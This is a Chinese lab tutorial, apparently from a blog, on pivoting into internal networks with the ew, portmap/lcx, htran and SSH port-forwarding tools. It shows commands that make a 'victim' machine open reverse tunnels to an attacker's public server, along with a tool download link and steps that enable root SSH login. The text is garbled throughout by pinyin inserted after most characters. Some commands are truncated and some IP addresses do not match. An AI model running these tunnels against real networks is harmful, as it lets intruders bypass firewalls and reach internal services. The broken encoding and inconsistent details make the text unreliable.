80端口攻击_内网端口转发工具的使用总结
0x00 ew端口轉(zhuǎn)發(fā)
0x01 portmap端口轉(zhuǎn)發(fā)
0x02 htran端口轉(zhuǎn)發(fā)
0x03 ssh端口轉(zhuǎn)發(fā)
0x00 ew端口轉(zhuǎn)發(fā)
環(huán)境準(zhǔn)備
攻擊機(jī) ? ?win7(物理機(jī)) 192.168.30.84
公網(wǎng)機(jī) ? ?kali ? ? ? ? ? 192.168.30.131
受害機(jī) ? ?win7(虛擬機(jī)) 192.168.30.126 ?(開啟phpstudy服務(wù))(請忽略攻擊機(jī)和受害機(jī)的交互)
正向代理
1.物理機(jī)直接訪問公網(wǎng)機(jī),公網(wǎng)機(jī)未建立lamp環(huán)境,所以無法訪問。
2.通過公網(wǎng)機(jī)將5555端口轉(zhuǎn)發(fā)到受害機(jī)的80端口,就可以訪問受害機(jī)的80端口。
3.發(fā)現(xiàn)訪問5555端口,訪問到了受害機(jī)的80端口。
反向代理
1.主機(jī)訪問http://127.0.0.1/phpmyadmin/index.php,無法連接。
2.公網(wǎng)機(jī)(kali)運(yùn)行./ew_for_linux -s rcsocks -l 5555 -e 6666 ?將5555的流量轉(zhuǎn)發(fā)到6666端口,開啟監(jiān)聽。
3.受害機(jī)(win7虛擬機(jī))運(yùn)行 ew_for_win_32.exe -s rssocks -d 192.168.32.100 -e 6666 流量轉(zhuǎn)發(fā)成功。
4.攻擊機(jī)(win7物理機(jī))配置proxifer
點(diǎn)擊 配置文件-->代理服務(wù)器-->添加公網(wǎng)機(jī)(配置如下)--->確定
配置文件-->代理規(guī)則-->選擇代理-->確定
5.再次訪問127.0.0.1/phpmyadmin訪問成功,訪問到了受害機(jī)的phpmyadmin。
0x01 portmap端口轉(zhuǎn)發(fā)
工具最初使用的初衷是內(nèi)網(wǎng)滲透,需要將內(nèi)網(wǎng)ssh端口轉(zhuǎn)發(fā)到外網(wǎng)服務(wù)器上。但這個工具同樣適用于運(yùn)維工程師進(jìn)行遠(yuǎn)程內(nèi)網(wǎng)維護(hù)。
在windows下使用是lcx,在linux使用時為portmap。
前提:內(nèi)網(wǎng)可以訪問外網(wǎng),檢測方法就是直接ping一個外網(wǎng)IP即可。
下載地址:http://www.vuln.cn/wp-content/uploads/2016/06/lcxvuln.cn.zip
再本節(jié),為了操作結(jié)果明顯,故使用ssh(22)端口作為轉(zhuǎn)發(fā)端口。
環(huán)境準(zhǔn)備
公網(wǎng)機(jī)(我這里是阿里云centos) 47.240.62.93
受害機(jī)(kali虛擬機(jī)) ? ? ? ? ? 192.68.23.149
攻擊機(jī)(虛擬機(jī)centos) ?
外網(wǎng)主機(jī)設(shè)置
1.外網(wǎng)主機(jī)開啟6666和7777端口
2.設(shè)置portmap權(quán)限為777
kali開啟ssh服務(wù)
1.修改/etc/ssh/sshd_config配置文件:
vi /etc/ssh/sshd_config
2.找到#PasswordAuthentication yes
把“#”去掉
3.找到# PermitRootLogin prohibit-password ?改為PermitRootLogin yes
4.啟動ssh服務(wù)
/etc/init.d/ssh start
5.設(shè)置開機(jī)自動啟動
update-rc.d ssh enable
反向代理
1.虛擬主機(jī)執(zhí)行 ?
./portmap -m 2 -p1 6666 -h2 47.240.62.93 -p2 7777
開始監(jiān)聽6666傳來的數(shù)據(jù),然后監(jiān)聽7777端口提供訪問
2.kali虛擬機(jī)執(zhí)行? ./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 ?
將內(nèi)網(wǎng)主機(jī)22端口的流量轉(zhuǎn)發(fā)到公網(wǎng)主機(jī)的6666端口。
3.再本地centos虛擬機(jī)測試是否可以連接。使用ssh root@47.240.62.93 -p 7777
0x02 htran端口轉(zhuǎn)發(fā)
環(huán)境準(zhǔn)備
Win7物理機(jī) ?192.168.30.84
Win7虛擬機(jī) ?192.168.30.126
Win03虛擬機(jī) 192.168.23.129
情景:
一.服務(wù)器處于公網(wǎng),可直接訪問,已經(jīng)開啟3389,防火墻禁止直接連接3389
二.服務(wù)器處于公網(wǎng),攻擊機(jī)需要連接服務(wù)器所處內(nèi)網(wǎng)的受害機(jī)。
使用方法:
本地監(jiān)聽轉(zhuǎn)發(fā)
-p -listen ConnectPort TransmitPort
指定主機(jī)端口轉(zhuǎn)發(fā)
-p -tran ConnectPort TransmitHost TransmitPort
將指定主機(jī)(TransmitHost)的指定端口轉(zhuǎn)發(fā)到指定主機(jī)的指定端口,待連接的主機(jī)(ConnectHost)需先處于監(jiān)聽模式
-p -slave ConnectHost ConnectPort TransmitHost TransmitPort
端口轉(zhuǎn)發(fā)
1.將3389端口轉(zhuǎn)發(fā)到其他端口進(jìn)行連接。
使用htran20.exe -p -tran 3333 127.0.0.1 3389
3389端口已經(jīng)轉(zhuǎn)發(fā)到3333端口,輸入192.168.23.129:3333連接。
2.攻擊機(jī)監(jiān)聽端口,受害機(jī)轉(zhuǎn)發(fā)端口到攻擊機(jī)監(jiān)聽的端口。
攻擊機(jī)(Win7虛擬機(jī))監(jiān)聽端口
受害機(jī)(Win03虛擬機(jī))轉(zhuǎn)發(fā)端口
Win7物理機(jī)訪問win7虛擬機(jī)9999端口即可
0x03 ssh端口轉(zhuǎn)發(fā)
準(zhǔn)備:
A機(jī)器 ?本地linux虛擬機(jī) ? ? centos ? ? 192.168.23.147
B機(jī)器 ?公網(wǎng)機(jī) ? ? ? ? ? ? ?centos ? ? 47.240.62.93
A機(jī)器添加bbb用戶
B機(jī)器添加aaa用戶
B機(jī)器開啟7280和1234端口
使用方法:
反向代理 ssh -fCNR
正向代理 ssh -fCNL
-f 后臺執(zhí)行ssh指令
-C 允許壓縮數(shù)據(jù)
-N 不執(zhí)行遠(yuǎn)程指令
-R 將遠(yuǎn)程主機(jī)(服務(wù)器)的某個端口轉(zhuǎn)發(fā)到本地端指定機(jī)器的指定端口
-L 將本地機(jī)(客戶機(jī))的某個端口轉(zhuǎn)發(fā)到遠(yuǎn)端指定機(jī)器的指定端口
-p 指定遠(yuǎn)程主機(jī)的端口
端口轉(zhuǎn)發(fā):
1.建立A機(jī)器到B機(jī)器的反向代理
ssh -fCNR 7280:localhost:22 aaa@47.240.62.93
檢查是否啟動? ps aux | grep ssh
2.B機(jī)器正向代理,實(shí)現(xiàn)端口轉(zhuǎn)發(fā),來連接A機(jī)器。
ssh -fCNL *:1234:localhost:7280 localhost
檢查是否啟用? ps aux | grep ssh
1234端口為本地轉(zhuǎn)發(fā)端口,負(fù)責(zé)和外網(wǎng)進(jìn)行通信,并將數(shù)據(jù)轉(zhuǎn)發(fā)的7280這個端口,實(shí)現(xiàn)了可以從其他機(jī)器訪問的功能。
*代表所有可以接受任何ip的訪問
3.在B機(jī)器上輸入命令ssh -p1234 bbb@47.240.62.93
在上面指定了1234端口為轉(zhuǎn)發(fā)端口,故用1234端口登陸,然后bbb是內(nèi)網(wǎng)A機(jī)器的用戶名,47.240.62.93為公網(wǎng)B機(jī)器的IP地址。
測試:
輸入ip a查看當(dāng)前ip,確認(rèn)為A機(jī)器ip,轉(zhuǎn)發(fā)成功。
總結(jié)
以上是生活随笔為你收集整理的80端口攻击_内网端口转发工具的使用总结的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: linux 查看正在执行的进程的pid编
- 下一篇: mac你没有权限打开应用程序_苹果mac